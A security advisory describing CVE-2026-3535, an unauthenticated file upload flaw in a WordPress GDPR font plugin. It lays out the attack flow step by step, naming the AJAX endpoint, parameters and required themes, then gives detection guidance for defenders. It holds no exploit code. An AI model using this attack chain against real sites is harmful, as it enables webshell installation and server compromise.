Introduction
An unauthenticated arbitrary file upload vulnerability in a WordPress GDPR compliance plugin gives anonymous attackers a direct path to remote code execution on affected sites. The flaw, tracked as CVE-2026-3535, scores a critical 9.8 on the CVSS scale and currently has no available patch.
The DSGVO Google Web Fonts GDPR plugin was built to help WordPress site owners comply with European GDPR regulations by downloading and locally hosting Google Fonts, rather than loading them directly from Google's servers. While the plugin addresses a legitimate privacy concern in the WordPress ecosystem, its implementation introduced a severe security flaw that completely undermines the security posture of any site running it. The plugin is listed on the official WordPress plugin repository.
Technical Information
Root Cause: Missing File Type Validation on a Public AJAX Endpoint
The vulnerability is classified under CWE-434 (Unrestricted Upload of File with Dangerous Type). The core issue resides in the DSGVOGWPdownloadGoogleFonts() function, which is responsible for fetching Google Font files and storing them locally on the WordPress server.
This function is registered via a wp_ajax_nopriv_ hook. In WordPress, the wp_ajax_nopriv_ prefix specifically designates an AJAX handler that accepts requests from unauthenticated users. The plugin developers did not implement any authentication checks, capability verifications, or nonce validation on this endpoint. As a result, any anonymous visitor on the internet can invoke this function by sending a crafted POST request to /wp-admin/admin-ajax.php.
The CVSS vector confirms the severity of this design flaw:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
This indicates network accessibility, low attack complexity, no privileges required, no user interaction needed, and high impact across confidentiality, integrity, and availability.
Attack Flow
The exploitation chain proceeds as follows:
-
Attacker prepares a malicious CSS file. The attacker hosts a CSS file on a server they control. This CSS file contains embedded URLs that point not to legitimate font files, but to malicious payloads such as PHP webshells.
-
Attacker sends a POST request. The attacker issues an HTTP POST to the target WordPress site's
/wp-admin/admin-ajax.phpendpoint with the parameteraction=DSGVOGWPdownloadGoogleFontsand afonturlparameter pointing to the attacker controlled CSS file. -
Plugin fetches the attacker's CSS. The
DSGVOGWPdownloadGoogleFonts()function useswp_remote_get()to retrieve the content at the suppliedfonturl. It treats the response as CSS and parses it to extract URLs. -
Plugin downloads referenced files without validation. The function iterates over the extracted URLs and downloads each referenced file. These files are written directly into the
wp-content/dsgvo-google-web-fonts-gdpr/fonts/directory. Critically, no file type validation occurs at any point in this process. The function does not check file extensions, MIME types, or file contents. -
Webshell lands in a publicly accessible directory. The downloaded PHP file is now sitting in a web accessible path on the server.
-
Attacker executes arbitrary commands. The attacker navigates to the uploaded file's URL and achieves remote code execution on the underlying server.
Theme Prerequisite
Successful exploitation requires the WordPress site to be actively using one of six specific themes:
| Theme | Notes |
|---|---|
| twentyfifteen | Default WordPress theme |
| twentysixteen | Default WordPress theme |
| twentyseventeen | Default WordPress theme |
| storefront | Popular WooCommerce theme |
| salient | Premium theme |
| shapely | Free theme |
The presence of any single theme from this list satisfies the exploitation condition. Several of these are default WordPress themes that ship with every WordPress installation, which broadens the practical attack surface considerably.
Relevant Source Code Locations
The vulnerable function registration can be found at line 46 of the plugin source, and the vulnerable download logic begins at line 159.
Detection Methods
While no formal detection signatures (YARA, Sigma, Snort, or Suricata rules) have been published for CVE-2026-3535 at this time, the technical details from the CVE record and Wordfence advisory provide rich material for building effective detection strategies.
Web Server Access Log Analysis
The most direct detection approach is monitoring web server access logs for suspicious POST requests targeting the WordPress AJAX endpoint. Look for HTTP POST requests to /wp-admin/admin-ajax.php where the request body contains action=DSGVOGWPdownloadGoogleFonts. In normal operation, this AJAX action would only be triggered by an authenticated administrator through the plugin's settings page. Any request from an unauthenticated session (missing WordPress authentication cookies such as wordpress_logged_in_*) is a strong indicator of exploitation. Pay close attention to the fonturl parameter value: legitimate use would reference fonts.googleapis.com URLs, while exploitation attempts will point to attacker controlled domains hosting malicious CSS that embeds URLs to PHP payloads.
File Integrity Monitoring (FIM)
Since the vulnerability writes downloaded files directly into the wp-content/dsgvo-google-web-fonts-gdpr/ directory tree (with font files landing in the fonts/ subdirectory), file integrity monitoring is an essential detection layer. Under legitimate operation, this directory should only contain font files (.woff, .woff2, .ttf, .eot) and CSS files (.css). The presence of any .php files, or any file with a non font extension in the wp-content/dsgvo-google-web-fonts-gdpr/fonts/ directory, is a strong indicator of compromise. Unexpected creation or modification of files in this directory outside of administrative actions should trigger an alert.
WAF Based Detection
Web Application Firewalls can be configured to inspect POST requests to admin-ajax.php. A targeted rule should flag or block any request where the action parameter equals DSGVOGWPdownloadGoogleFonts and the request lacks valid WordPress administrative authentication. A more permissive rule could flag cases where the fonturl parameter contains domains other than fonts.googleapis.com, since the plugin's intended function is solely to download Google hosted fonts.
Plugin Presence Detection
As a baseline, security teams should inventory WordPress installations for the presence of the dsgvo-google-web-fonts-gdpr plugin. The Wordfence advisory confirms there is no patch available, and the affected versions span all releases through 1.1. Detecting the plugin's active presence by checking the wp-content/plugins/dsgvo-google-web-fonts-gdpr/ directory or querying the WordPress options table for DSGVOGWP_use_google_web_fonts is a critical first step in scoping exposure.
Post Exploitation Indicators
If exploitation has already occurred, look for:
- Outbound HTTP requests originating from the WordPress server to unfamiliar domains, as the vulnerable function uses
wp_remote_get()to fetch attacker supplied URLs. - Unexpected files in
wp-content/dsgvo-google-web-fonts-gdpr/fonts/that are not font files. Webshells placed through this vulnerability may retain the filename from the attacker's malicious CSS. - Modified wp_options entries for
DSGVOGWP_use_google_web_fonts,DSGVOGWP_use_google_web_fonts_status, orDSGVOGWP_stylesheet, as the vulnerable function callsupdate_option()on these keys upon successful download.
Note that the exploit only triggers on sites running the specific themes listed above, which can help scope detection efforts.
Affected Systems and Versions
The vulnerability affects all versions of the DSGVO Google Web Fonts GDPR plugin up to and including version 1.1. There is no patched version available.
Exploitation additionally requires the WordPress site to have one of the following themes actively enabled:
- twentyfifteen
- twentysixteen
- twentyseventeen
- storefront
- salient
- shapely
Sites running the vulnerable plugin version without one of these themes active are not exploitable through this specific vector, but should still remove the plugin given the lack of any available patch.
References
- CVE Record: CVE-2026-3535
- NVD: CVE-2026-3535
- Wordfence Threat Intel: CVE-2026-3535
- Wordfence Advisory: DSGVO Google Web Fonts GDPR <= 1.1 Unauthenticated Arbitrary File Upload
- Plugin Source (Tag 1.1): Line 46 (Hook Registration)
- Plugin Source (Tag 1.1): Line 159 (Vulnerable Function)
- Plugin Source (Trunk): Line 46
- Plugin Source (Trunk): Line 159
- Plugin Source (SVN Tag 1.1)
